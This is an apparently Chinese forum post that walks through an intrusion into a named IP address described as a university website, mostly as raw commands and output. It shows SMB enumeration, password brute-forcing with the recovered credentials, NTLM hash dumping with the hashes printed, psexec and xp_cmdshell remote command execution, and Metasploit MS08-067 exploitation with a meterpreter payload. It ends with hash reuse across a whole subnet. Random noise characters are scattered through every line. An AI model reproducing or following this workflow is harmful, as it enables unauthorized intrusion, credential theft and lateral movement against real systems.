广西师范网站http://202.103.242.241/
1 q7 T/ b& f9 B S( O+ Q5 `$ M2 o% \+ R8 M# z: h% M
root@bt:~# nmap -sS -sV 202.103.242.241
- H4 `7 |4 K8 e/ c" N/ o: L2 J/ I
9 A+ u3 P' g- ?: w* ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
9 G/ G% b/ z8 M; f# e* W" A: i3 p0 h- ^3 R: M3 @, ~
Nmap scan report for bogon (202.103.242.241)8 G8 ]" ?; G3 H
2 w- Z1 c! M9 bHost is up (0.00048s latency).
" f/ T( b% d! b" N8 c2 ~' u3 V; X4 m: c1 D4 j1 N, E! }! o
Not shown: 993 closed ports1 g& g# ^* k, d: y9 d& [
) X: z# w1 _0 a# F% ^) s
PORT STATE SERVICE VERSION _+ B0 B. i P0 H1 h$ b
' g. h+ A) D+ C( E( b$ Y) k135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 Y" P& a) U! @1 L; P
, f3 J0 g2 m( m: t/ p2 R- L. g
139/tcp open netbios-ssn
d5 v. G& A! @5 S* C. m: _3 W2 T: z" [3 Z! B# x
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds" M& t" z: H, \% z( b( [
& J; Y6 k8 [! Z5 F+ a
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)4 {% h) H9 F# D1 X
3 X! _3 w$ a/ r, I) }1026/tcp open msrpc Microsoft Windows RPC
* b$ v6 P$ T: Q2 _: W
( w4 c1 i' r' K3372/tcp open msdtc?
/ v0 C3 c/ B) l
" e' F& s: _) z) k% O3389/tcp open ms-term-serv?
0 H+ _, g4 z; L% X. t3 W5 G. _
( ]! ]1 V) Y2 U7 C1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :7 j! w0 C( x4 X4 b
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r7 g; y; j3 I; ` c, c
1 h" f; A1 O6 m. s2 HSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions2 s/ e7 ]5 R9 Z& {
; X: f) Q* J" E6 {* O
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
1 k" s) m3 b: K& f: u& p8 e; a: O0 ~- I( K9 }5 |) l5 E' K$ s
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO; h6 {1 W W/ A! ~% O2 G
G* V! X0 p2 J" k8 z' t- a
SF:ptions,6,”hO\n\x000Z”);
' L+ O* E4 J8 o8 {: G3 w$ K/ X, C# R* }% g
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ w2 P9 r2 S& t3 }7 a( U& X! C$ M2 ]9 s5 f! _' U
Service Info: OS: Windows
v" `7 k! J- A" O6 s" f# N
, P! i0 f& F0 b u# a' d, J Z& sService detection performed. Please report any incorrect results at http://nmap.org/submit/ .+ c$ y' y7 E4 i
* @6 D. a# t0 z$ H4 F; d0 jNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
" k+ v. s8 i1 V, c" C* A9 j. b/ A, m6 p
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
! y" G, e l" W' h4 @, e; `
% x4 |4 B" h& D! i; Z-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
( K. Q: @& x1 q* X2 g5 u, A A3 }% ], @- x7 B3 P. H3 Z
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
# B E8 S1 V" l* ^9 i9 C* Y5 T5 w* w: b8 u4 Y- `, W) I, W7 i
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
8 E9 D3 @* X* D
1 F$ W2 {- c. G-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
0 h x( Y% C8 ]! x0 M N6 X$ n; _
8 ~& a6 W9 P: G/ n2 H-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
1 o# | A5 f4 R, U4 b2 p6 E
: [( @0 U6 H' n7 B-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse& T S6 l: A- A% I" K4 v
- V5 e9 c8 D1 p& Q# ?1 v- @
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
: f5 B; D( { z: n
; v" ]0 |3 l2 u m( u-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse5 [# K- i+ p1 R/ U
2 L/ Z3 Q$ T* y4 E6 M-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse6 k) p- a3 A( L0 `% X6 U. _1 V! w
8 f1 f0 B: J, ~7 S& N# [
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
5 Z( R+ y! O1 |. E0 F
5 B# m) t: r+ c) Z* e% N1 T-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 e, h/ f) ~$ c- T' M8 Q
- {0 G) R j8 s# g# t-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse' u J+ B, k. Y& X& `
% O( `! {5 U0 }, z6 s3 q
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse6 D0 S5 L5 @# }+ I
) `6 {8 @5 l0 |( b/ k-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse6 F2 @' o3 n0 S- [: C1 E) ~+ h9 _
: v8 g' q7 O5 m' \
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse% U5 I! p! n/ Y! N/ `
1 e. k( d; u) h, R7 j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
7 G' x- K8 G# ^' [$ j
0 o2 L j! }- k; E2 Q; q//此乃使用脚本扫描远程机器所存在的账户名
% u1 M! ], K$ d( b1 Q! B9 }* h% z4 t/ }& M/ C8 c7 M6 H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST: t' L V+ f8 G
4 g6 g7 h$ k9 T, s9 q. L
Nmap scan report for bogon (202.103.242.241)& V* U7 c& O- H' {) \
* t0 p) x' W9 r0 D6 }6 |* u
Host is up (0.00038s latency).2 Q0 R* ], h4 I$ Z0 W4 e1 E, g X: d
/ z/ m" b8 E1 q% C, s) n
Not shown: 993 closed ports: K, x- x/ G3 H; |( ~
7 f3 g& H8 c% Z7 I+ o2 cPORT STATE SERVICE
' e+ T2 `5 v( {- [' h
% S$ e' g0 o7 k+ E( A% B135/tcp open msrpc' l; f* t2 ~) f! {. A
" A7 E. v6 j' c
139/tcp open netbios-ssn
7 D/ W( D7 r; N4 @5 K3 v/ j& n( ~: ^. U: ], {
445/tcp open microsoft-ds& K% i# X0 g* P8 g& j8 Z6 u
8 G$ A9 y/ Y( r) M* b
1025/tcp open NFS-or-IIS
& i# K: @$ W! s- ^
2 }5 n+ F4 E8 p9 a5 F- y) O1026/tcp open LSA-or-nterm% V1 c2 @/ O" h& g3 A' m; a1 p, {+ W
: b1 M5 k! j# t! o3 C) o3372/tcp open msdtc! Y( A& ^. u& Y
# a0 i- W8 c. r- \* F* h; Y3389/tcp open ms-term-serv" k* S2 Y, s1 G% x# H
4 I/ ?- I1 y7 i7 tMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ w, u1 p% H) I: D2 c9 }
( Q; t! K1 P5 g. t% y' n3 P3 x- I* y
Host script results:
1 f" ]+ m6 r& v) |, h- C6 d
: W1 a) [& M- k2 o0 V9 j| smb-enum-users:
8 E+ v/ H0 C0 Y- B8 N% y: J( `; _/ \4 A4 c1 |" ]: [
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果* N# Y: S- ~0 K) U
! n6 r& G% M& r( |2 u
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 b" L( h3 Z3 W2 O6 }
. Q; N4 k1 a) |- d6 g hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 a$ V) m4 G2 r3 g: l! I. X, r# _
7 f* }5 P, {8 b, o8 F9 i//查看共享. }) J1 i8 r+ Q8 i8 k& U
# C' J. a& C" J" H4 o" [Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
9 U1 k* y. {# i9 r) T; B7 E
6 [$ X8 N2 G9 O N/ g5 PNmap scan report for bogon (202.103.242.241)
: @2 ~# r. R J5 {& f' J8 P* ~7 b. c0 M' k
Host is up (0.00035s latency).
* C2 k/ L3 h, C2 i4 m; I
' d6 f/ w+ t7 b( i0 S) t2 \/ V1 SNot shown: 993 closed ports# E' |/ [' F8 U
: m% z n; X5 C2 `' u: A
PORT STATE SERVICE* f3 U$ Q: E/ d; ^. Y
! r) U9 F2 ~5 ~; M8 Z135/tcp open msrpc& A0 w, q% p% h f5 Z. _
' Y: d$ h6 D o6 ~139/tcp open netbios-ssn5 l& k( g+ d) u/ g: C
0 o- V7 g& C# Q8 f: c$ z445/tcp open microsoft-ds
P, L( J6 @' k* y) V- I: P6 k# d! c" b* Q6 y( q; }4 D
1025/tcp open NFS-or-IIS/ }8 {4 A T5 m! a4 h# |
) @6 o" d$ N; w- V1026/tcp open LSA-or-nterm
/ [0 A6 S+ i$ c1 h
+ ?% I6 B, i p7 _ z. o3372/tcp open msdtc
# J9 i3 P m( _- ~* {
5 R% J1 L" z _3 O3 C2 h3389/tcp open ms-term-serv. W7 C: o1 Z: z1 Q
% |& v5 c/ C! T. A" q4 g2 d
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( w6 V& c8 V2 l' x( `
, `6 k- ?1 A. ~8 f$ x: xHost script results:% U6 Q3 p# L9 }
/ k5 B2 M* s1 j$ P5 t| smb-enum-shares:
9 _1 X6 e2 r* N# z+ n) H* ~
. l2 W; W- ^/ g: g/ z| ADMIN$& w; b# A7 h2 N3 X3 g! B2 r
: E9 D7 u" H o| Anonymous access: <none>
% @% F5 U2 f. M3 A1 w2 E0 ^
& {! f. z. p) d+ R7 N| C$
) a) m9 [3 p: _ f* k
6 d9 j; E8 b2 T- f4 W4 s| Anonymous access: <none>
4 {# `: A* ?' @9 y/ t
& Z! T! E' R6 ?3 ?: v* e- w- c G. m| IPC$' H( G( b, x1 F6 q2 F# {6 ?7 V
& T4 N: Z w) |5 m: J: {|_ Anonymous access: READ
( v! u2 W# C) Q; i4 N4 y
- h6 q: I% S9 u0 a0 s; t& \# |0 c- \Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds3 }4 R5 \' u: d" t! |4 x
, L9 h8 m7 U2 \+ q$ {# q- Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
G/ M* h# p; X7 c5 G: I# a( e: ~8 j5 Y5 R
//获取用户密码" f# B2 D# S4 X4 @+ C/ W$ G; B
4 T- ], y! y& NStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST/ o3 a9 e4 C" v# t" r p
; F3 _# l! M' NNmap scan report for bogon (202.103.242.2418)
! @4 ^4 I" C2 J J d, n- h2 p3 n- T+ F( \( f1 |
Host is up (0.00041s latency).( S: c" M) ?+ V
$ f- l/ F3 E: @- b. L4 c0 \
Not shown: 993 closed ports
# g6 Q- v! Q0 J+ T' b
* j1 P y# n; fPORT STATE SERVICE2 _) Y6 g1 P3 Q% J/ ]
7 h5 m; l( j8 |' |# [5 U0 t135/tcp open msrpc
9 k1 O/ g4 i; q% j5 T7 S/ L7 O3 [- a- ?+ A7 t
139/tcp open netbios-ssn, o( Y- t4 x# B" Q
: a" e, \. j( o0 R, Q2 L: s
445/tcp open microsoft-ds1 @( M8 S; i' s, Z, ^8 |! K# F7 i/ O
3 Q5 k; l5 B$ K- T ]$ p8 t7 \
1025/tcp open NFS-or-IIS3 z' X( m/ V0 |1 ^. r; \& i
3 s" E3 j u. ?! A7 x- ^+ e1026/tcp open LSA-or-nterm
, D( p5 A8 m- K! } q' @
$ Y$ r3 T" R) n- \3372/tcp open msdtc
1 R; v- w# u7 e" r+ l8 O* d. x! d7 _& u8 r" L x( k
3389/tcp open ms-term-serv
( ] H* x+ U/ }
" e; N/ E% `- C& l6 O/ I5 F: GMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 e$ x- D2 Q6 \7 u, l z# D3 m. V! t8 Z
Host script results:
8 W% ]% _1 b) b+ `
' r. p i. Y: |5 f| smb-brute:
6 u( ]* n, t* U! G- `& e8 { A9 |6 j9 I. r% Z# x9 } I
administrator:<blank> => Login was successful
$ F/ c* {6 ]. r+ Q, ~" j( _" `7 G% }% v) ^) W) [
|_ test:123456 => Login was successful0 g$ q, s* {# _# [/ E, u5 W L
% }2 O* j8 d( jNmap done: 1 IP address (1 host up) scanned in 28.22 seconds' ~% D: ?3 S2 m! h
{0 r/ y8 O2 jroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash6 ^( K! ^+ x6 q* p; h
/ ^0 D u# z0 F* p4 l/ D5 ~
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
" x6 _# N) i: |$ {" g$ E# L. o5 w5 p
5 q0 C2 m9 J Y, c+ l) w/ ~+ Eroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse: A$ z; h& y" \
0 t6 k( D* o1 b( g0 H# d Proot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139- N8 s. b3 B. n+ ?+ F+ k; b! I
4 H1 U+ R; Z- p6 d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
9 c1 \+ J4 w I* q0 a, k: X. L1 |9 d- `) l( @; b* t
Nmap scan report for bogon (202.103.242.241)
4 M( ~- z7 h: U+ k2 A
$ }! t1 ]5 c& o$ m5 b) H. J2 e6 hHost is up (0.0012s latency). K/ ^1 {$ H! i1 [2 l$ F
6 L" p- B; z4 U$ N4 Z
PORT STATE SERVICE8 J2 Z& c& k7 s9 t8 y% w# R q
8 O' u; C+ X: E, u135/tcp open msrpc
6 r+ x" N8 F7 Q |1 J; X$ U+ n4 L2 _/ [: L6 m$ |7 [% L6 W
139/tcp open netbios-ssn
6 U% \& t2 z, d' V. r5 C
" A! _9 l* X; G6 b& ~* o445/tcp open microsoft-ds, r t3 U X4 e6 [6 z) ]
# ?/ z0 J" f( ~/ {- O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 z7 M+ a# P" Q! }) ^, F- J% h/ T2 ~* L3 f
Host script results:
/ K2 P$ o; F$ H9 o T4 x; `# Q) T) w; \+ Y, k
| smb-pwdump:% @# `% x$ `7 X5 X# o$ C
& j/ r1 M; N4 }1 U0 x6 p
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
- k7 x; z) y4 J6 e
* J9 l+ H& k( A5 G3 k! e' k3 b| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************" ?8 W7 j5 i! |& @
7 @: G/ F1 B7 w8 ~" m0 d, O| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4; j7 R' v2 W4 ]% M$ B8 L. l z) q
7 C! n' g. x b2 J( v0 o! M
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
6 F+ \( z+ a. b% l; s) ~" R8 j: e9 y3 r- @+ l% Z3 l( A
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
6 l+ G" x+ ]/ }( Z8 A0 m, Y) S) @( u- x- Y# Y4 Y
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
, C. V8 J u r9 _$ ^5 k
7 @( H* N5 H! y7 e1 G. X-p 123456 -e cmd.exe* i" V; D! j2 I# f2 Y- s2 h
$ x J4 o! T1 K7 n: R* W3 L
PsExec v1.55 – Execute processes remotely
P# u5 @( a8 J- N( H' m8 [1 C6 F- Y7 _6 K
Copyright (C) 2001-2004 Mark Russinovich
\2 V, h2 a7 v/ Y, [2 K, H, k. S5 ]* |0 a: Y5 u9 F6 e
Sysinternals – www.sysinternals.com# }- r/ V4 Q6 A: j
. t, O. }; V! Y, Z5 w' RMicrosoft Windows 2000 [Version 5.00.2195]
/ n* a: L; s: t7 w* e& U& g) J/ `- N$ O/ l% d
(C) 版权所有 1985-2000 Microsoft Corp.
/ G0 {) V5 R9 V; Z
- Y( x! \7 F- a0 ^, Q ?' M3 vC:\WINNT\system32>ipconfig: O5 Y, K' t2 ?8 h& B$ W
1 J( ^8 o. B: m% X& ~- i
Windows 2000 IP Configuration& {* y3 s( @: @( m" Z
0 s+ R/ H# K, T- ]0 v# Z
Ethernet adapter 本地连接:
& @. H# C7 ^& @7 L N5 }' J/ }& q4 T1 Q" ]1 @' e& o: u
Connection-specific DNS Suffix . :
+ D( W+ O- v( T6 j, s6 Q& ~3 e
9 j0 l2 Z9 Z- D6 dIP Address. . . . . . . . . . . . : 202.103.242.241
7 Z r% E) Z9 x. P- x
" r2 ?% j9 V7 x! p; F) `# @6 TSubnet Mask . . . . . . . . . . . : 255.255.255.0; v' @ Z8 N! e, s# Z
& [- N3 ~* X$ @4 G. hDefault Gateway . . . . . . . . . : 202.103.1.1
6 k& @' c0 Y0 h& v% y2 `4 k6 s/ K- }* d; |0 b
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令5 b% n8 f5 n/ r) @# r- S
$ H4 X1 {% \) f4 V+ wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞4 L, `( |6 a) `/ i3 Y3 [
8 c8 X' u' r. Q8 g3 F/ R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
: n% L$ |+ R6 y7 k9 m" r F/ h- H$ U
Nmap scan report for bogon (202.103.242.241)9 ~, b* r# j: n% l
( m7 @0 j$ Y* }
Host is up (0.00046s latency).
$ e6 p% |5 c8 c
' }5 e! |8 n8 ~6 w; m& }7 SNot shown: 993 closed ports
9 o0 o. G8 a+ A! x S% ]& I0 E% a v" i1 H" s& m. H% {
PORT STATE SERVICE
/ G/ l# T, b/ H# u6 m
; |6 V$ c; F$ A* z! z. [& n7 b8 Y135/tcp open msrpc
. f4 H" j$ w2 c& }& a5 {
) P$ E R6 W$ R7 @' x139/tcp open netbios-ssn8 s4 @: e3 ^. D9 L F1 a$ b
* n' M6 V+ I; T3 I9 ]) E9 A445/tcp open microsoft-ds7 M1 b! R2 T, i$ l% G/ J2 i
) _7 j0 W3 V, `( a0 f$ K% K1 [1025/tcp open NFS-or-IIS6 o' p- m. _: U; ~& b: S6 T
- ?$ L7 b1 z% d% g1026/tcp open LSA-or-nterm
# g( F6 L, O& ]0 n y1 d! Y/ Y6 G5 m: Q6 j5 W; p1 d0 W
3372/tcp open msdtc3 c: J/ J& u8 E+ d* h( L
0 Y) R+ M+ h3 y3 P
3389/tcp open ms-term-serv
2 {4 S5 f( E7 F3 Q% `% }
( d5 v7 ^. F8 z( C3 v: Y/ L6 w/ h# |MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ D, I6 ^( B& u* s
, ~$ D( k3 f- o; @) \: ~2 A
Host script results:
9 k! n/ V u9 p% w: P- Q8 q4 r+ n$ I. Q, O/ N
| smb-check-vulns:
* t2 w7 p- F+ Q7 B9 Y$ P% b
1 U, y7 @: I* i* P- x|_ MS08-067: VULNERABLE; I N4 {, @+ J6 ^' |3 d p+ u3 A& v
; |6 E7 [/ b9 k
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
' b' w' a6 ]; K: b1 R$ D" D7 _! t6 V
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出. Q( {1 L4 p7 |$ h4 h9 ^
2 l' Q# v- I7 z0 a
msf > search ms08; D2 Z% y9 \$ B* C* M. Y1 B3 u: f
$ H0 p6 v$ I7 K+ T: o; [# K9 Wmsf > use exploit/windows/smb/ms08_067_netapi7 k/ j+ [ o3 a9 i
- j- P6 M5 Z+ a+ ~9 D- imsf exploit(ms08_067_netapi) > show options
$ L$ T6 y0 Y) ~1 w! G; v5 I) ~" r3 M1 L; O/ i4 n- S* L" P" d9 N8 p
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
5 C8 r. {2 q4 m8 }1 `) D
, k( J0 e, M- k( ` M5 g4 m% Omsf exploit(ms08_067_netapi) > show payloads
; |% {9 R+ S) P, ]" h8 f: k
: K' E' Y3 Q. t/ M5 |7 Kmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
* f- N& z' |/ K! J% k/ t" K6 W
4 _5 a. }( {1 h, g7 e2 a$ s2 Kmsf exploit(ms08_067_netapi) > exploit l& g0 C& o/ O! M) f
, v6 u3 T6 i0 {- tmeterpreter >
, K0 a. C0 p, C# \' k' `- I3 ~. f P$ q: H% ~. a6 @" ~* {/ k; j7 ?
Background session 2? [y/N] (ctrl+z)
% J9 g* ~( W7 X% S1 k# E
% f2 M0 @/ S4 nmsf exploit(ms08_067_netapi) > sessions -l
" S( ?; f4 E+ G$ B+ b2 A5 L
- v C. q+ x) d Y F; Kroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
% {" Y1 t7 W( J2 o/ I% M: ]7 k) v" z, K$ H
test
) G2 V1 D6 ~( C- Q- o# s+ v# @" W, V5 w( `
administrator
5 p/ k; K! o/ T' {( x
% m5 @4 {7 _: h$ |( sroot@bt:/usr/local/share/nmap/scripts# vim password.txt. N B7 L& {) y9 q" X2 e2 }$ {* ?
3 Q' @* n! g! _) a3 I44EFCE164AB921CAAAD3B435B51404EE, j& ~) ]$ a! w0 I' ? T: _' I
7 d' o) }7 V, P1 x# T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 9 Y) Q. T: J9 t# _7 p: B0 ~
+ s% q: c5 D5 y& c) H6 Y
//利用用户名跟获取的hash尝试对整段内网进行登录
5 R( j# k/ K1 f
; W- S6 U6 P- eNmap scan report for 192.168.1.1057 m3 m' q/ W; v! `
1 b$ \) a9 z+ _9 P) e
Host is up (0.00088s latency).
2 V& b. _9 `$ j( Q( G R& s7 A' N
4 y* I* k" G/ L1 b+ r" mNot shown: 993 closed ports
" a. u/ D1 E8 B4 y- B
8 b. Q9 h( f o+ z( E: `" c& ~) YPORT STATE SERVICE8 `( S9 n0 i% L% H0 V4 a) n
6 {0 d" T$ Z9 [- i* D135/tcp open msrpc
- i& X4 i0 ?% x7 [1 O5 a/ L: v
0 g: r, ~# f* v& U [- @) ~# K139/tcp open netbios-ssn; H' l7 v Y8 c; J' m: }' {) S7 @9 {
5 W$ ^+ W$ e" |6 c0 e445/tcp open microsoft-ds
7 s, [) _; J" u4 b5 q0 X$ T
# `9 E3 C" h7 P% B9 S6 o" r4 x1025/tcp open NFS-or-IIS! k- a* j0 M9 \7 H, y7 c
- z% z; N$ h, I- K' L( l* ]
1026/tcp open LSA-or-nterm
6 p+ T$ W/ V5 J# t3 ]6 s7 \6 {7 ?1 c" m
3372/tcp open msdtc
6 T5 k5 m) L; V+ O9 f' |! t/ M: ]/ y! ?
3389/tcp open ms-term-serv
\2 C& l8 ?6 _3 |
. M# j, D! G( v% N6 F6 j Z3 d" c% zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: I8 G% p6 G! {8 O$ ?1 a, B, W* R( B6 G
Host script results:
* M+ s8 S- N/ x# a5 n
* O3 [! P& [; Z; @) U+ j% X| smb-brute:+ W5 Y7 d6 ?, k1 { z
- A9 R; Z: z3 p: w+ X' ~
|_ administrator:<blank> => Login was successful
3 B: ?# Y' a1 {7 t) q8 B* X$ d ~# U0 i
攻击成功,一个简单的msf+nmap攻击~~· \) J* K3 `' L6 K9 c( i! B0 B
7 X7 T* A. _5 d% f2 R# L p3 w |
发表于 2012-12-4 12:46:42
收藏
支持
反对